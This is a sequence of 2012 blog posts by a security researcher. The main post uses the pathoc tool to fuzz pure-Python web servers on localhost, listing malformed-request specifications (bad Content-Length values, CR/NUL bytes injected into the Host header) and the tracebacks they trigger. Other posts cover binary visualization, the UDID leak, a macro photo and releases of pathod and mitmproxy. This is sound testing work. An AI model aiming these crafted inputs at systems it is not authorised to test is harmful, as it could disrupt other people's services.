2012-09-27T00:00:00+00:00
2012-09-27T00:00:00+00:00
https://corte.si/posts/code/pathod/pythonservers/
<p>A few months ago, I announced <a href="http://pathod.net">pathod</a>, a pathological HTTP
daemon. The project started as a testing tool to let me craft
standards-violating HTTP responses while working on
<a href="http://mitmproxy.org">mitmproxy</a>. It soon became a free-standing project, and
has turned out to be incredibly useful in security testing, exploit delivery and
general creative mischief. In the last release, I added pathoc - pathod's
malicious client-side twin. It does for HTTP requests what pathod does for HTTP
responses, and uses the same <a href="http://pathod.net/docs/language">hyper-terse specification
language</a>.</p>
<p>In this post, I show how pathoc can be used as a very simple fuzzer, by finding
issues in a number of major pure-Python webservers. None of the tested servers
failed catastrophically - they all caught the unexpected exception and continued
serving requests. None the less, I think it's reasonable to say that we've
triggered a bug if a) the server returns a 500 Internal Server Error response
or terminates the connection abnormally, and b) we see a traceback in our logs.
In fact, by this definition, I found bugs in <em>every</em> pure-Python server I
tested.</p>
<p>All of the problems I list below are simple failures of validation - what they
have in common is that somewhere in the project, code is called with input that
it doesn't expect and can't handle. This matters - in fact, I'd argue that the
majority of security problems fall in this category. It's interesting to ponder
why this type of issue is so ubiquitous in Python servers. I have no doubt that
part of the answer lies in Python's use of exceptions - errors that would be
explicit in other languages can be implicit in Python, and code that seems clean
and intuitive might in fact be buggy. I think this is especially relevant right
now, given the recent flurry of discussion surrounding the <a href="http://golang.org/">Go
language</a> and its error handling. It's pretty instructive to
read Russ Cox's <a href="https://plus.google.com/116810148281701144465/posts/iqAiKAwP6Ce">recent
riposte</a> to
<a href="http://uberpython.wordpress.com/2012/09/23/why-im-not-leaving-python-for-go/">this
post</a>
criticizing Go's explicit approach, while looking at the bugs below. <a href="https://github.com/cortesi">I love
Python</a> and I think it's a fine language, but I also
think the designers of Go probably made the right choice.</p>
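<p>To make the contrast concrete, here's a sketch of my own (not code from any of the servers below) showing how the failing <strong>int(content_length)</strong> calls in the tracebacks look when the language forces the error into the open. In Go, the possible failure is part of the parsing function's signature, so the caller has to decide up front what a malformed header means:</p>

```go
package main

import (
	"fmt"
	"strconv"
)

// parseContentLength converts a Content-Length header value to an int.
// Unlike Python's int(), which raises an exception the caller may never
// have thought about, the error here is an explicit return value.
func parseContentLength(value string) (int, error) {
	n, err := strconv.Atoi(value)
	if err != nil {
		return 0, fmt.Errorf("invalid Content-Length %q: %v", value, err)
	}
	if n < 0 {
		return 0, fmt.Errorf("negative Content-Length: %d", n)
	}
	return n, nil
}

func main() {
	// A malformed header becomes a 400 Bad Request decision, not a traceback.
	if _, err := parseContentLength("x"); err != nil {
		fmt.Println("reject request:", err)
	}
}
```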
<h2 id="basic-fuzzing-with-pathoc">Basic fuzzing with pathoc</h2>
<p>My methodology for these tests was very simple indeed. I launched each server in
turn, and used pathoc to fire corrupted GET requests at the daemon until I saw
an error. I then looked at the logs, and boiled the distinct cases down to a
minimal pathoc specification by hand. This exercises a rather shallow set of
features in the server software - mostly parsing of the HTTP lead-in and request
headers. It's possible to give software a much, much deeper workout with pathoc,
but I'll leave that for a future post.</p>
<p>My pathoc fuzzing command looked something like this:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#bf616a;">pathoc -n</span><span style="color:#c0c5ce;"> 1000</span><span style="color:#bf616a;"> -p</span><span style="color:#c0c5ce;"> 8080</span><span style="color:#bf616a;"> -t</span><span style="color:#c0c5ce;"> 1 localhost '</span><span style="color:#a3be8c;">get:/:b@10:ir,"\x00"</span><span style="color:#c0c5ce;">'
</span></code></pre>
<p>The most important flags here are <b>-n</b>, which tells pathoc to make 1000
consecutive requests, and <b>-t</b>, which tells pathoc to time out after one
second (necessary to prevent hangs when daemons terminate improperly). The
request specification itself breaks down as follows:</p>
<table class="table">
<tr>
<td>get</td>
<td>Issue a GET request</td>
</tr>
<tr>
<td>/</td>
<td>... to the path / </td>
</tr>
<tr>
<td>b@10</td>
<td>... with a body consisting of 10 random bytes </td>
</tr>
<tr>
<td>ir,"\x00"</td>
<td>... and inject a NULL byte at a random location.</td>
</tr>
</table>
<p>It's that last clause - the random injection - that makes the difference between
simply crafting requests and basic fuzzing. Every time a new request is issued,
the injection occurs at a different location. I varied the injected character
between a NULL byte, a carriage return and a random alphabet letter. Each
exposed different errors in different servers. For a complete description of the
specification language, see the <a href="http://pathod.net/docs/language">online docs</a>.</p>
<h2 id="results">Results</h2>
<p>For each bug, I've given a traceback and a minimal pathoc call to trigger the
issue. The tracebacks have been edited lightly to shorten file paths and
remove irrelevances like timestamps.</p>
<h3 id="cherrypy">CherryPy</h3>
<pre style="background-color:#2b303b;">
<code><span style="color:#bf616a;">pathoc -p</span><span style="color:#c0c5ce;"> 8080 localhost '</span><span style="color:#a3be8c;">get:/:b@10:h"Content-Length"="x"</span><span style="color:#c0c5ce;">'
</span></code></pre><pre style="background-color:#2b303b;">
<code><span style="color:#c0c5ce;">ENGINE ValueError("invalid literal for int() with base 10: 'x'",)
Traceback (most recent call last):
File "cherrypy/wsgiserver/wsgiserver2.py", line 1292, in communicate
req.parse_request()
File "cherrypy/wsgiserver/wsgiserver2.py", line 591, in parse_request
success = self.read_request_headers()
File "cherrypy/wsgiserver/wsgiserver2.py", line 711, in read_request_headers
if mrbs and int(self.inheaders.get("Content-Length", 0)) > mrbs:
ValueError: invalid literal for int() with base 10: 'x'
</span></code></pre><pre style="background-color:#2b303b;">
<code><span style="color:#bf616a;">pathoc -p</span><span style="color:#c0c5ce;"> 8080 localhost '</span><span style="color:#a3be8c;">get:/:i4,"\r"</span><span style="color:#c0c5ce;">'
</span></code></pre><pre style="background-color:#2b303b;">
<code><span style="color:#c0c5ce;">ENGINE TypeError("argument of type 'NoneType' is not iterable",)
Traceback (most recent call last):
File "cherrypy/wsgiserver/wsgiserver2.py", line 1292, in communicate
req.parse_request()
File "cherrypy/wsgiserver/wsgiserver2.py", line 580, in parse_request
success = self.read_request_line()
File "cherrypy/wsgiserver/wsgiserver2.py", line 644, in read_request_line
if NUMBER_SIGN in path:
TypeError: argument of type 'NoneType' is not iterable
</span></code></pre><h3 id="tornado">Tornado</h3>
<pre style="background-color:#2b303b;">
<code><span style="color:#bf616a;">pathoc -p</span><span style="color:#c0c5ce;"> 8080 localhost '</span><span style="color:#a3be8c;">get:/:b@10:h"Content-Length"="x"</span><span style="color:#c0c5ce;">'
</span></code></pre><pre style="background-color:#2b303b;">
<code><span style="color:#c0c5ce;">[E 120927 11:42:26 iostream:307] Uncaught exception, closing connection.
Traceback (most recent call last):
File "tornado/iostream.py", line 304, in wrapper
callback(*args)
File "tornado/httpserver.py", line 254, in _on_headers
content_length = int(content_length)
ValueError: invalid literal for int() with base 10: 'x'
[E 120927 11:42:26 ioloop:435] Exception in callback <tornado.stack_context._StackContextWrapper object at 0x1012e28e8>
Traceback (most recent call last):
File "tornado/ioloop.py", line 421, in _run_callback
callback()
File "tornado/iostream.py", line 304, in wrapper
callback(*args)
File "tornado/httpserver.py", line 254, in _on_headers
content_length = int(content_length)
ValueError: invalid literal for int() with base 10: 'x'
</span></code></pre><pre style="background-color:#2b303b;">
<code><span style="color:#bf616a;">pathoc -p</span><span style="color:#c0c5ce;"> 8080 localhost '</span><span style="color:#a3be8c;">get:/:h"h\r\n"="x"</span><span style="color:#c0c5ce;">'
</span></code></pre><pre style="background-color:#2b303b;">
<code><span style="color:#c0c5ce;">[E iostream:307] Uncaught exception, closing connection.
Traceback (most recent call last):
File "tornado/iostream.py", line 304, in wrapper
callback(*args)
File "tornado/httpserver.py", line 236, in _on_headers
headers = httputil.HTTPHeaders.parse(data[eol:])
File "tornado/httputil.py", line 127, in parse
h.parse_line(line)
File "tornado/httputil.py", line 113, in parse_line
name, value = line.split(":", 1)
ValueError: need more than 1 value to unpack
[E ioloop:435] Exception in callback <tornado.stack_context._StackContextWrapper object at 0x1012bd7e0>
Traceback (most recent call last):
File "tornado/ioloop.py", line 421, in _run_callback
callback()
File "tornado/iostream.py", line 304, in wrapper
callback(*args)
File "tornado/httpserver.py", line 236, in _on_headers
headers = httputil.HTTPHeaders.parse(data[eol:])
File "tornado/httputil.py", line 127, in parse
h.parse_line(line)
File "tornado/httputil.py", line 113, in parse_line
name, value = line.split(":", 1)
ValueError: need more than 1 value to unpack
</span></code></pre><h3 id="twisted">Twisted</h3>
<pre style="background-color:#2b303b;">
<code><span style="color:#bf616a;">pathoc -p</span><span style="color:#c0c5ce;"> 8080 localhost '</span><span style="color:#a3be8c;">get:/:b@10:h"Content-Length"="x"</span><span style="color:#c0c5ce;">'
</span></code></pre><pre style="background-color:#2b303b;">
<code><span style="color:#c0c5ce;">[HTTPChannel,4,127.0.0.1] Unhandled Error
Traceback (most recent call last):
File "twisted/python/log.py", line 84, in callWithLogger
return callWithContext({"system": lp}, func, *args, **kw)
File "twisted/python/log.py", line 69, in callWithContext
return context.call({ILogContext: newCtx}, func, *args, **kw)
File "twisted/python/context.py", line 118, in callWithContext
return self.currentContext().callWithContext(ctx, func, *args, **kw)
File "twisted/python/context.py", line 81, in callWithContext
return func(*args,**kw)
--- <exception caught here> ---
File "twisted/internet/selectreactor.py", line 150, in _doReadOrWrite
why = getattr(selectable, method)()
File "twisted/internet/tcp.py", line 199, in doRead
rval = self.protocol.dataReceived(data)
File "twisted/protocols/basic.py", line 564, in dataReceived
why = self.lineReceived(line)
File "twisted/web/http.py", line 1558, in lineReceived
self.headerReceived(self.__header)
File "twisted/web/http.py", line 1580, in headerReceived
self.length = int(data)
exceptions.ValueError: invalid literal for int() with base 10: 'x'
</span></code></pre><h3 id="simplehttp">SimpleHTTP</h3>
<pre style="background-color:#2b303b;">
<code><span style="color:#bf616a;">pathoc -p</span><span style="color:#c0c5ce;"> 8080 localhost '</span><span style="color:#a3be8c;">get:"/\0"</span><span style="color:#c0c5ce;">'
</span></code></pre><pre style="background-color:#2b303b;">
<code><span style="color:#c0c5ce;">Exception happened during processing of request from ('127.0.0.1', 54029)
Traceback (most recent call last):
File "lib/python2.7/SocketServer.py", line 284, in _handle_request_noblock
self.process_request(request, client_address)
File "lib/python2.7/SocketServer.py", line 310, in process_request
self.finish_request(request, client_address)
File "lib/python2.7/SocketServer.py", line 323, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "lib/python2.7/SocketServer.py", line 638, in __init__
self.handle()
File "python2.7/BaseHTTPServer.py", line 340, in handle
self.handle_one_request()
File "lib/python2.7/BaseHTTPServer.py", line 328, in handle_one_request
method()
File "lib/python2.7/SimpleHTTPServer.py", line 44, in do_GET
f = self.send_head()
File "lib/python2.7/SimpleHTTPServer.py", line 68, in send_head
if os.path.isdir(path):
File "lib/python2.7/genericpath.py", line 41, in isdir
st = os.stat(s)
TypeError: must be encoded string without NULL bytes, not str
</span></code></pre><h3 id="waitress">Waitress</h3>
<pre style="background-color:#2b303b;">
<code><span style="color:#bf616a;">pathoc -p</span><span style="color:#c0c5ce;"> 8080 localhost '</span><span style="color:#a3be8c;">get:/:i16," "</span><span style="color:#c0c5ce;">'
</span></code></pre><pre style="background-color:#2b303b;">
<code><span style="color:#c0c5ce;">ERROR:waitress:uncaptured python exception, closing channel
<waitress.channel.HTTPChannel connected 127.0.0.1:62330 at 0x1007ca310>
(
<type 'exceptions.IndexError'>:list index out of range
[lib/python2.7/asyncore.py|read|83]
[lib/python2.7/asyncore.py|handle_read_event|444]
[lib/python2.7/site-packages/waitress/channel.py|handle_read|169]
[lib/python2.7/site-packages/waitress/channel.py|received|186]
[lib/python2.7/site-packages/waitress/parser.py|received|99]
[lib/python2.7/site-packages/waitress/parser.py|parse_header|158]
[lib/python2.7/site-packages/waitress/parser.py|get_header_lines|247]
)
</span></code></pre>
<p><strong>Edit: The first version of this post had examples that were due to the test
WSGI application, not waitress. I've replaced them with the traceback above,
which has been reformatted for clarity.</strong></p>
<h3 id="werkzeug">Werkzeug</h3>
<pre style="background-color:#2b303b;">
<code><span style="color:#bf616a;">pathoc -p</span><span style="color:#c0c5ce;"> 8080 localhost '</span><span style="color:#a3be8c;">get:/:h"Host"="n\r\0"</span><span style="color:#c0c5ce;">'
</span></code></pre><pre style="background-color:#2b303b;">
<code><span style="color:#c0c5ce;">Traceback (most recent call last):
File "flask/app.py", line 1518, in __call__
return self.wsgi_app(environ, start_response)
File "flask/app.py", line 1507, in wsgi_app
return response(environ, start_response)
File "/usr/local/lib/python2.7/site-packages/werkzeug/wrappers.py", line 1082, in __call__
app_iter, status, headers = self.get_wsgi_response(environ)
File "werkzeug/wrappers.py", line 1070, in get_wsgi_response
headers = self.get_wsgi_headers(environ)
File "werkzeug/wrappers.py", line 986, in get_wsgi_headers
headers['Location'] = location
File "werkzeug/datastructures.py", line 1132, in __setitem__
self.set(key, value)
File "werkzeug/datastructures.py", line 1097, in set
self._validate_value(_value)
File "werkzeug/datastructures.py", line 1065, in _validate_value
raise ValueError('Detected newline in header value. This is '
ValueError: Detected newline in header value. This is a potential security problem
</span></code></pre>
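<p>All of these crashes come down to bytes that a well-behaved client would never emit. As an illustration (a minimal sketch of the idea, not pathoc's actual implementation), here is how the request behind the Werkzeug example above - a Host header containing a carriage return and a NUL - might be assembled by hand:</p>

```python
def build_request(method, path, headers):
    # Assemble a raw HTTP/1.1 request with no validation at all -
    # the point is to emit bytes a sane client never would.
    lines = ["%s %s HTTP/1.1" % (method, path)]
    lines += ["%s: %s" % (k, v) for k, v in headers]
    return ("\r\n".join(lines) + "\r\n\r\n").encode("latin-1")

# Equivalent in spirit to the pathoc spec get:/:h"Host"="n\r\0"
raw = build_request("GET", "/", [("Host", "n\r\x00")])
```

<p>The resulting bytes can then be written straight to a socket connected to the target server.</p>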
Limits of data visualization with space filling curves
2012-09-20T00:00:00+00:00
2012-09-20T00:00:00+00:00
https://corte.si/posts/visualisation/hilbert-snake/
<p>I recently wrote a <a href="https://corte.si/posts/visualisation/binvis/">series</a> of
<a href="https://corte.si/posts/visualisation/entropy/">posts</a> using the <a href="https://corte.si/posts/code/hilbert/portrait/">Hilbert
curve</a> to visualize binaries,
culminating in a <a href="https://corte.si/posts/visualisation/malware/">gallery showing regions of high entropy in
malware</a>.</p>
<div class="media">
<a href="../malware/08b983ec55bfd50d1d2cb9a90b1ae54e.html">
<img src="malwarexample.png" />
</a>
</div>
<p>The fact that the Hilbert curve has excellent locality preservation means that
one dimensional features are preserved (as much as they can be) in the
two-dimensional layout. This lets us visually pick out features of interest, and
makes it possible, for instance, to quickly identify different malware packers
just based on their layout characteristics.</p>
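<p>The locality property is easy to check directly. Here is a minimal sketch of the standard iterative conversion from a one-dimensional index to Hilbert-curve coordinates (the textbook algorithm, not the code behind these images):</p>

```python
def d2xy(n, d):
    # Map index d along a Hilbert curve filling an n x n grid
    # (n a power of two) to (x, y) coordinates.
    x = y = 0
    t = d
    s = 1
    while s < n:
        rx = 1 & (t // 2)
        ry = 1 & (t ^ rx)
        if ry == 0:  # rotate the quadrant
            if rx == 1:
                x, y = s - 1 - x, s - 1 - y
            x, y = y, x
        x += s * rx
        y += s * ry
        t //= 4
        s *= 2
    return x, y

# Consecutive indices always land on adjacent cells:
pts = [d2xy(16, d) for d in range(256)]
```

<p>Every step along the index moves exactly one cell in the grid, which is why contiguous runs of bytes stay visually contiguous in the layout.</p>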
<p>An obvious next step is to ask if it's possible to extend this idea to let us
visually compare binaries, creating a sort of visual diff. Unfortunately, we now
bump our heads against the limitations of space-filling curve visualization. I
made the animation below after a recent conversation along these lines, and I
think it illustrates the main issues nicely. It shows a single contiguous
stretch of data (the black area) being shifted progressively through a binary.
At each timestep, the only thing that changes is the starting location of the
data block:</p>
<div class="media">
<a href="hilbertsnake.gif">
<img src="hilbertsnake.gif" />
</a>
</div>
<p>Two things are immediately clear:</p>
<ul>
<li>The block of data doesn't retain its
shape at different offsets - identical stretches of data can look totally
different depending on their locations.</li>
<li>There's no way to quickly see
<em>where</em> in the binary a piece of information lies. Unless you are very familiar
with the particular curve and know its exact orientation, you can't say, for
instance, when the data block lies a third of the way through the binary.</li>
</ul>
<p>It's often worthwhile to trade off these things for locality preservation, but
it definitely scotches certain use cases. I do wonder if it might be possible to
tune the trade-off somewhat - sacrificing some locality preservation for better
shape retention and offset estimation. I've toyed with some ideas along these
lines (see the unrolled layouts in the <a href="https://corte.si/posts/visualisation/binvis/">binary visualization
post</a>), but I still don't have a
satisfying solution. If anyone out there knows of one, drop me a line.</p>
Finding the UDID leak: a guessing game

2012-09-07T00:00:00+00:00
2012-09-07T00:00:00+00:00
https://corte.si/posts/security/udid-leak-guessing/
<p>It's become quite a popular parlor game to guess who is responsible for the
recent Antisec UDID leak. I've now seen no fewer than six separate apps named as
the probable source (two of which came from <a href="http://www.marco.org">Marco
Arment</a>). Before we pick the next culprit, I think it's
worth taking a step back to consider the list of things we <em>don't</em> know:</p>
<ul>
<li>We don't know that we're dealing with just one source. The Antisec dump may
well be an amalgam of data from various sources.</li>
<li>We don't know that we're looking for just one app, or even a set of apps by
one developer. The leak may well come from one of the myriad third-party services
that could be included in thousands of apps.</li>
<li>We don't know that Antisec is being truthful about the scale of the database,
or the additional data they claim is associated with the UDID/APNS records.</li>
<li>We certainly don't know that the data was filched from an FBI laptop or that
the NCFTA was in any way involved.</li>
</ul>
<p>Given all of these unknowns, I think a simple process-of-elimination approach to
tracking down the leak will probably be fruitless, or worse, result in the
finger being pointed at even more innocent parties. The one entity that may
already have the answer to this question is Apple. They have a list of a million
affected UDIDs, and they presumably have records of all apps that have ever used
the associated push tokens. Given a large and precise sample like this, it
should be possible to find the origin(s) of the leak reasonably easily. Indeed,
if Apple is on the ball they may already have done this.</p>
<p>Now for some frank speculation of my own. Let's assume for a moment that Antisec
has been entirely truthful about the data, and that we're dealing with a single
source. In that case, we're looking for:</p>
<ul>
<li>... an app or third-party service integrated into multiple apps</li>
<li>... with 12 million or more users</li>
<li>... that is APNS-enabled</li>
<li>... which also gathers user data like real names and zip codes.</li>
</ul>
<p>I'll throw my hat in the ring and say that my money is on a third-party service,
not a single app. If my hunch is right, the list of possible culprits is
actually rather short.</p>
The UDID leak is a privacy catastrophe
2012-09-04T00:00:00+00:00
2012-09-04T00:00:00+00:00
https://corte.si/posts/security/udid-leak/
<p>Something I've been worrying about for a long time has just happened: <a href="http://pastebin.com/nfVT7b0Z">Antisec
has leaked a database with more than a million
UDIDs</a>. The UDID issue has been a bit of a white
whale of mine - I've written many blog posts about it and spent more hours than
I care to think negotiating responsible disclosure with companies misusing
UDIDs. Let's recap some of the posts I've written about this:</p>
<ul>
<li><a href="http://corte.si/posts/security/openfeint-udid-deanonymization/index.html">In May 2011</a>,
just before its sale to Gree was announced, I showed that
<a href="http://en.wikipedia.org/wiki/OpenFeint">OpenFeint</a> was misusing UDIDs in a way
that allowed you to link a UDID to a user's identity, geolocation and Facebook
and Twitter accounts. Though I didn't discuss it openly at the time, you could also
completely take over an OpenFeint account, and access chat, forums, friends
lists, and more using just a UDID. This resulted in a class-action lawsuit
against OpenFeint, which has since petered out.</li>
<li><a href="http://corte.si/posts/security/apple-udid-survey/index.html">Later that month</a>, I
published a survey looking at how UDIDs are used in practice.
The data is now slightly out of date, but shows just how widely UDIDs are used and misused.</li>
<li><a href="http://corte.si/posts/security/udid-must-die/index.html">In September 2011</a>,
I published the most troubling news so far, which
paradoxically also got the least coverage in the press. I looked at
<em>all</em> the gaming social networks on iOS - basically OpenFeint and its
competitors - and found catastrophic mismanagement by nearly everyone. The
vulnerabilities ranged from de-anonymization, to takeover of the user's gaming
social network account, to the ability to completely take over the user's
Facebook and Twitter accounts using just a UDID.</li>
</ul>
<p>As serious as these problems are, I'm afraid it's just the tip of the iceberg.
Negotiating disclosure and trying to convince companies to fix their problems
has taken literally months of my time, so I've stopped publishing on this issue
for the moment. It's disheartening to say it, but some of the companies
mentioned in my posts <em>still</em> have unfixed problems (they were all notified well
in advance of any publication). I will also note ominously that I know of a
number of similar vulnerabilities elsewhere in the iOS app ecosystem that I've
just not had the time to pursue.</p>
<p>When speaking to people about this, I've often been asked "What's the worst
that can happen?". My response was always that the worst case scenario would be
if a large database of UDIDs leaked... and here we are.</p>
Defiler
2012-08-26T00:00:00+00:00
2012-08-26T00:00:00+00:00
https://corte.si/posts/photos/lymantriid/
<p>I've been living out of a bag for the last 3 weeks, working hard on a series of
intense but fun audits. After running in high gear for a while I find that I
need a mental palate cleanser - something to help me refocus and stop me from
getting snowblind. I then grab my camera, strap on my macro rig, and walk out
the door to try to catch the local wildlife in the act. It's become a bit of a
game - the aim is to catch creatures in their natural setting and leave them
completely undisturbed when I go, with no posing, prodding or other
disturbances. Getting a usable shot of a 5mm target sitting on a twig swaying in
the wind is a fun challenge.</p>
<p>Today I find myself in Sydney, working in a part of the town that is shot
through with unreasonably beautiful walking tracks. The place is also blessed
with a huge diversity of invertebrate life that makes my <a href="http://en.wikipedia.org/wiki/Dunedin">adopted home
town</a> seem barren by comparison. I walked
along a nearby track until I found a quiet, leafy spot, geared up, and
leopard-crawled through the underbrush. Not long after, I came face-to-face with
this imposing little chap sitting on the tip of a fern frond.</p>
<div class="media">
<a href="./lymantriid2.jpg">
<img src="./lymantriid2.jpg" />
</a>
</div>
<p>This is a <a href="http://en.wikipedia.org/wiki/Lymantriidae">Lymantriid</a> caterpillar
of some variety, probably one of the tussock moths native to Australia.
"Lymantria" means "defiler" - some species of this family can cause huge damage
to foliage, and are considered to be destructive pests - so much so that when a
single male <a href="http://en.wikipedia.org/wiki/Gypsy_moth">Gypsy Moth</a> (Lymantria
dispar) was discovered in Hamilton, New Zealand, they sprayed the entire city
with a caterpillar-specific <a href="http://www.biosecurity.govt.nz/pests-diseases/forests/gypsy-moth/residents/foray.htm">bacterial
insecticide</a>.</p>
<p>No need for drastic measures with this particular fellow, though - he's native
to this ecosystem, and the only pest is me and my camera. He was head down
munching away when I found him, and paid absolutely no attention to me when I
moved in close to get these shots. He's got reason to be cocksure, too - those
tufts of hair on his back contain hollow, poison-filled spines that can cause a
pretty unpleasant reaction when touched.</p>
<div class="media">
<a href="./lymantriid1.jpg">
<img src="./lymantriid1.jpg" />
</a>
</div>
<p>A few hours of exploring and photographing is a very effective brain-cleaner,
leaving me ready to deal with spiny, venomous defilers of the digital variety.</p>
pathod 0.2: the daemon gets an evil twin
2012-08-22T00:00:00+00:00
2012-08-22T00:00:00+00:00
https://corte.si/posts/code/pathod/announce0_2/
<p>I've just pushed pathod 0.2 out the door. This is a huge release, with many new
features:</p>
<ul>
<li><a href="http://pathod.net/docs/pathoc">pathoc</a>, pathod's evil client-side twin.</li>
<li><a href="http://pathod.net/docs/test">libpathod.test</a>, a framework for using pathod in your unit tests.</li>
<li><a href="http://pathod.net/docs/language">Improved mini language</a>, including many new abilities and improvements.</li>
<li>A rewrite of the networking core.</li>
</ul>
<p>The project also has a new website at <a href="http://pathod.net">pathod.net</a>. Yes,
pathod is now self-hosting, so you can try out both pathod and pathoc
specifications right on the website. There's also a new <a href="http://public.pathod.net/200:b%22hello,%20sailor.%22">public pathod
instance</a>, which I'm sure
everyone will use entirely responsibly.</p>
Introducing pathod: a pathological HTTP server
2012-05-01T00:00:00+00:00
2012-05-01T00:00:00+00:00
https://corte.si/posts/code/pathod/announce0_1/
<p>I've just released <a href="http://cortesi.github.com/pathod">pathod</a>, a pathological
HTTP/S daemon useful for testing and torturing HTTP clients. At its core is a
tiny, terse language for crafting HTTP responses. It also has a built-in web
interface that lets you play with the response spec language, inspect logs, and
access pathod's full help document.</p>
<p>The rest of this post is a quick teaser showing some of pathod's abilities. See
the detailed documentation on the <a href="http://cortesi.github.com/pathod">pathod
site</a> if you want more.</p>
<h2 id="the-simplest-possible-response">The simplest possible response</h2>
<p>The easiest way to craft a response is to specify it directly in the request
URL. Let's start with the simplest possible example. Start pathod, and then visit
this URL:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#c0c5ce;">http://localhost:9999/p/200
</span></code></pre>
<p>The "/p/" path is the location of the response generator in pathod's default
configuration - everything after it is a response specification in pathod's
mini-language. The general form of a response spec is as follows:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#c0c5ce;">code[MESSAGE]:[colon-separated list of features]
</span></code></pre>
<p>In this case, we're specifying only the HTTP response code - that is, an HTTP
200 OK with no headers and no content, resulting in a response like this:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#c0c5ce;">HTTP/1.1 200 OK
</span></code></pre><h2 id="specifying-features">Specifying features</h2>
<p>One example of a "feature" is a response header. Let's embellish our response by
adding one:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#c0c5ce;">200:h"Etag"="foo"
</span></code></pre>
<p>The first letter of the feature - "h", in this case - is a mnemonic indicating
the type of feature we're adding. The full response to this spec looks like this:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#c0c5ce;">HTTP/1.1 200 OK
Etag: foo
</span></code></pre>
<p>Both "Etag" and "foo" are Value Specifiers, a syntax used throughout the
response specification language. In this case they are literal values, as
indicated by the fact that they are quoted strings. The Value Specification
syntax also lets us load values from files or generate random data. For
instance, here is a specification that generates 100k of random binary data for
the header value:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#c0c5ce;">200:h"Etag"=@100k
</span></code></pre>
<p>Now, binary data in the header value will probably break things in interesting
ways, but is unlikely to be read by the client as a valid (but over-long)
value. To see if the client really drops off its perch if we feed it a single
100k header, we have to constrain the random data. Here's the same response,
but with data generated only from ASCII letters:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#c0c5ce;">200:h"Etag"=@100k,ascii_letters
</span></code></pre>
<p>pathod has a large number of built-in character classes from which random
data can be generated.</p>
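<p>The idea behind those character classes is simple enough to sketch in a few lines of Python. This is purely illustrative - the function name and the fallback behaviour are my own, not pathod's generator:</p>

```python
import random
import string

def random_value(size, charclass=None):
    # Sketch of pathod's @-style value generation: random bytes by
    # default, or bytes drawn from a named character class.
    if charclass == "ascii_letters":
        alphabet = string.ascii_letters.encode()
    else:
        alphabet = bytes(range(256))
    return bytes(random.choice(alphabet) for _ in range(size))
```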
<h2 id="pauses-and-disconnects">Pauses and Disconnects</h2>
<p>Next, we can disrupt the communications in various ways. At the moment, this
means adding pauses and disconnects to a response. Let's start with an HTTP 404
response with a body consisting of 100k of random binary data:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#c0c5ce;">404:b@100k
</span></code></pre>
<p>Here's the same response, but with a 120 second pause after sending 100 bytes:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#c0c5ce;">404:b@100k:p120,100
</span></code></pre>
<p>And the same response again, but with a hard disconnect after sending 100 bytes:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#c0c5ce;">404:b@100k:d100
</span></code></pre>
<p>Instead of specifying an offset explicitly, we can ask pathod to disconnect
at a random point of its choosing:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#c0c5ce;">404:b@100k:dr
</span></code></pre>
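<p>Since specs travel in the request URL, characters like ":" and "@" need to be percent-encoded when you drive pathod from a script. A small modern-Python sketch, assuming a default-configuration pathod listening on port 9999:</p>

```python
from urllib.parse import quote

def pathod_url(spec, host="localhost", port=9999):
    # Build the URL that asks a default-configuration pathod
    # (the /p/ anchor) to serve the given response spec.
    return "http://%s:%d/p/%s" % (host, port, quote(spec, safe=""))
```

<p>Requesting <code>pathod_url('404:b@100k:d100')</code> with any HTTP client then exercises the truncated-response case above.</p>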
<p>That's it for the teaser - hopefully it's enough to entice you into looking at
<a href="http://cortesi.github.com/pathod">pathod</a>'s full documentation.</p>
<h2 id="what-s-next">What's next?</h2>
<p>pathod is an "airport project" - the first draft was written in its
entirety during a 40-hour trip back home from New York (I drew a bad lot in
stopovers). I've now firmed it up a bit, but there's still work to be done. In
the next month, mitmproxy's test suite will move to pathod, after which
there will be a simple, well-documented way to unit test against it. I also plan to build
out the JSON API (which is used to drive pathod in test suites), and expand the
mini-language with convenient ways to generate pathological cookies,
authentication headers, SSL errors, and cache control.</p>
mitmproxy 0.8
2012-04-09T00:00:00+00:00
2012-04-09T00:00:00+00:00
https://corte.si/posts/code/mitmproxy/announce0_8/
<div class="media">
<a href="mitmproxy_0_8.png">
<img src="mitmproxy_0_8.png" />
</a>
</div>
<p>I'm happy to announce the release of <a href="http://mitmproxy.org">mitmproxy 0.8</a>.
This release has a few major new features, big speedups, and many, many small
bugfixes and improvements. Here are the headlines:</p>
<h2 id="android-interception">Android interception</h2>
<p>The most prominent new feature is that we now have a supported way to intercept
Android traffic. What's more, we can do this without a cumbersome transparent
proxying rig - see the <a href="http://mitmproxy.org/doc/certinstall/android.html">Android section in the
documentation</a> for the
details. Special thanks goes to <a href="http://twitter.com/yjmbo">Jim Cheetham</a> for
lending me an Android device and helping to get this feature off the ground.</p>
<h2 id="replacement-patterns">Replacement patterns</h2>
<p>Another exceedingly useful new feature is <a href="http://mitmproxy.org/doc/replacements.html">replacement
patterns</a>. These consist of a
filter, a regular expression and a replacement string, and run continuously
while mitmproxy processes requests and responses. You can pass these either on
the command-line, or using a built-in replacement pattern editor.</p>
<div class="media">
<a href="mitmproxy0_8_replace.png">
<img src="mitmproxy0_8_replace.png" />
</a>
</div>
<p>I'm sure you can immediately think of many uses for this flexible feature, but
my favourite is to use it during testing as a way to conveniently inject
complicated exploits into web traffic. I do this by setting a replacement
pattern that swaps a short but likely unique string (say MYXSS) for a long
exploit, and then I use simple interaction and front-end tools like Firebug to
inject exploits into requests manually based on the short string marker.</p>
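<p>In isolation, the mechanism is just a (filter, regex, replacement) triple applied to matching flows. Here is a stand-alone sketch of that idea - a hypothetical helper for illustration, not mitmproxy's actual API:</p>

```python
import re

def replace_in_flow(url, body, url_filter, pattern, replacement):
    # Apply a (filter, regex, replacement) triple to one flow:
    # only bodies whose URL matches the filter are rewritten.
    if not re.search(url_filter, url):
        return body
    return re.sub(pattern, replacement, body)

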